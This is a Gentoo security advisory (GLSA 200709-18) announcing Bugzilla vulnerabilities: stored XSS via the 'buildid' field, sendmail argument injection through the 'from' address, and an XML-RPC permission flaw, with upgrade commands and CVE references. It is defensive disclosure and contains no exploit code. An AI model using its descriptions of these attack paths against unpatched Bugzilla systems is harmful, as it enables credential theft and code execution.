Gentoo Archives: gentoo-announce

From: Raphael Marichez <falco@g.o>
To: gentoo-announce@g.o
Cc: bugtraq@×××××××××××××.com, full-disclosure@××××××××××××××.uk, security-alerts@×××××××××××××.com
Subject: [gentoo-announce] [ GLSA 200709-18 ] Bugzilla: Multiple vulnerabilities
Date: Sun, 30 Sep 2007 21:00:23
Message-Id: 20070930202317.GI10324@falco.falcal.net
1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2 Gentoo Linux Security Advisory GLSA 200709-18
3 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
4 http://security.gentoo.org/
5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
6
7 Severity: High
8 Title: Bugzilla: Multiple vulnerabilities
9 Date: September 30, 2007
10 Bugs: #190112
11 ID: 200709-18
12
13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
14
15 Synopsis
16 ========
17
18 Bugzilla contains several vulnerabilities, some of them possibly
19 leading to the remote execution of arbitrary code.
20
21 Background
22 ==========
23
24 Bugzilla is a web application designed to help with managing software
25 development.
26
27 Affected packages
28 =================
29
30 -------------------------------------------------------------------
31 Package / Vulnerable / Unaffected
32 -------------------------------------------------------------------
33 1 www-apps/bugzilla < 3.0.1 *>= 2.20.5
34 *>= 2.22.3
35 >= 3.0.1
36
37 Description
38 ===========
39
40 Masahiro Yamada found that from the 2.17.1 version, Bugzilla does not
41 properly sanitize the content of the "buildid" parameter when filing
42 bugs (CVE-2007-4543). The next two vulnerabilities only affect Bugzilla
43 2.23.3 or later, hence the stable Gentoo Portage tree does not contain
44 these two vulnerabilities: Loic Minier reported that the
45 "Email::Send::Sendmail()" function does not properly sanitise "from"
46 email information before sending it to the "-f" parameter of
47 /usr/sbin/sendmail (CVE-2007-4538), and Frédéric Buclin discovered
48 that the XML-RPC interface does not correctly check permissions in the
49 time-tracking fields (CVE-2007-4539).
50
51 Impact
52 ======
53
54 A remote attacker could trigger the "buildid" vulnerability by sending
55 a specially crafted form to Bugzilla, leading to a persistent XSS, thus
56 allowing for theft of credentials. With Bugzilla 2.23.3 or later, an
57 attacker could also execute arbitrary code with the permissions of the
58 web server by injecting a specially crafted "from" email address and
59 gain access to normally restricted time-tracking information through
60 the XML-RPC service.
61
62 Workaround
63 ==========
64
65 There is no known workaround at this time.
66
67 Resolution
68 ==========
69
70 All Bugzilla users should upgrade to the latest version:
71
72 # emerge --sync
73 # emerge --ask --oneshot --verbose www-apps/bugzilla
74
75 References
76 ==========
77
78 [ 1 ] CVE-2007-4538
79 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4538
80 [ 2 ] CVE-2007-4539
81 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4539
82 [ 3 ] CVE-2007-4543
83 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4543
84
85 Availability
86 ============
87
88 This GLSA and any updates to it are available for viewing at
89 the Gentoo Security Website:
90
91 http://security.gentoo.org/glsa/glsa-200709-18.xml
92
93 Concerns?
94 =========
95
96 Security is a primary focus of Gentoo Linux and ensuring the
97 confidentiality and security of our users machines is of utmost
98 importance to us. Any security concerns should be addressed to
99 security@g.o or alternatively, you may file a bug at
100 http://bugs.gentoo.org.
101
102 License
103 =======
104
105 Copyright 2007 Gentoo Foundation, Inc; referenced text
106 belongs to its owner(s).
107
108 The contents of this document are licensed under the
109 Creative Commons - Attribution / Share Alike license.
110
111 http://creativecommons.org/licenses/by-sa/2.5